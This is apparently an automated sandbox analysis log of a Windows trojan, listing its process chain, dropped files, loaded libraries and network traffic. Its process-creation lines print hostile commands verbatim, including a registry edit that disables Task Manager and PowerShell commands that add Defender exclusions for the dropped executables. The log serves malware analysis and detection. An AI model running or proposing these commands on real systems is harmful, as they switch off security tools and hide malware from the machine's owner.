                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49749 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00046FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00046FAA
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004848E0_2_0004848E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000540880_2_00054088
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000500B70_2_000500B7
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000440FE0_2_000440FE
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000571530_2_00057153
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000651C90_2_000651C9
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000562CA0_2_000562CA
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000432F70_2_000432F7
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000543BF0_2_000543BF
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004C4260_2_0004C426
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0006D4400_2_0006D440
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004F4610_2_0004F461
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000577EF0_2_000577EF
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004286B0_2_0004286B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0006D8EE0_2_0006D8EE
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004E9B70_2_0004E9B7
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_000719F40_2_000719F4
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00056CDC0_2_00056CDC
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00053E0B0_2_00053E0B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00064F9A0_2_00064F9A
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004EFE20_2_0004EFE2
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BAC0D4C6_2_00007FFD9BAC0D4C
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BAC0E436_2_00007FFD9BAC0E43
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBBB486_2_00007FFD9BEBBB48
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEB98516_2_00007FFD9BEB9851
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAF0BE528_2_00007FFD9BAF0BE5
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAF8A9228_2_00007FFD9BAF8A92
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAC0D4C28_2_00007FFD9BAC0D4C
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAC0E4328_2_00007FFD9BAC0E43
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAD0D2628_2_00007FFD9BAD0D26
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAD14CB28_2_00007FFD9BAD14CB
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 29_2_00007FFD9BAD0D4C29_2_00007FFD9BAD0D4C
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 29_2_00007FFD9BAD0E4329_2_00007FFD9BAD0E43
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAD0D2630_2_00007FFD9BAD0D26
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAD14CB30_2_00007FFD9BAD14CB
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAC0D4C30_2_00007FFD9BAC0D4C
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAC0E4330_2_00007FFD9BAC0E43
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAF0BE530_2_00007FFD9BAF0BE5
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAF8A9230_2_00007FFD9BAF8A92
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB0D2631_2_00007FFD9BAB0D26
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB14CB31_2_00007FFD9BAB14CB
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAA0D4C31_2_00007FFD9BAA0D4C
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAA0E4331_2_00007FFD9BAA0E43
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAD0C3331_2_00007FFD9BAD0C33
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAD8A9231_2_00007FFD9BAD8A92
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 32_2_00007FFD9BA90D4C32_2_00007FFD9BA90D4C
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 32_2_00007FFD9BA90E4332_2_00007FFD9BA90E43
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeCode function: 50_2_00007FFD9BAA0D4C50_2_00007FFD9BAA0D4C
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeCode function: 50_2_00007FFD9BAA0E4350_2_00007FFD9BAA0E43
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CjxtNgkC.log B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: String function: 0005F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: String function: 0005EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: String function: 0005EB78 appears 39 times
                                    Source: PbfYaIvR5B.exe, 00000000.00000003.1692775271.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exe, 00000000.00000003.1692775271.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exe, 00000000.00000003.1693125546.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exe, 00000000.00000003.1693125546.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exe, 00000000.00000002.1693797213.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exe, 00000000.00000002.1693797213.00000000031FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs PbfYaIvR5B.exe
                                    Source: PbfYaIvR5B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: MsPortSavesruntime.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AvdGjRxbXYfvkpkpztF.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AvdGjRxbXYfvkpkpztF.exe0.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Idle.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AvdGjRxbXYfvkpkpztF.exe1.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@46/68@3/4
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00046C74 GetLastError,FormatMessageW,0_2_00046C74
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0005A6C2
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\MaBbbrQq.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeMutant created: NULL
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Q4pXu1jRvCFsiermVNTU
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\AppData\Local\Temp\rfrVTonxuCJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCommand line argument: sfxname0_2_0005DF1E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCommand line argument: sfxstime0_2_0005DF1E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCommand line argument: STARTDLG0_2_0005DF1E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCommand line argument: xz0_2_0005DF1E
                                    Source: PbfYaIvR5B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: PbfYaIvR5B.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: PbfYaIvR5B.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeFile read: C:\Users\user\Desktop\PbfYaIvR5B.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\PbfYaIvR5B.exe "C:\Users\user\Desktop\PbfYaIvR5B.exe"
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\webHostnet\MsPortSavesruntime.exe "C:\webHostnet/MsPortSavesruntime.exe"
                                    Source: unknownProcess created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                    Source: unknownProcess created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                    Source: unknownProcess created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                    Source: unknownProcess created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                    Source: unknownProcess created: C:\webHostnet\MsPortSavesruntime.exe C:\webHostnet\MsPortSavesruntime.exe
                                    Source: unknownProcess created: C:\webHostnet\MsPortSavesruntime.exe C:\webHostnet\MsPortSavesruntime.exe
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\webHostnet\MsPortSavesruntime.exe "C:\webHostnet/MsPortSavesruntime.exe"Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
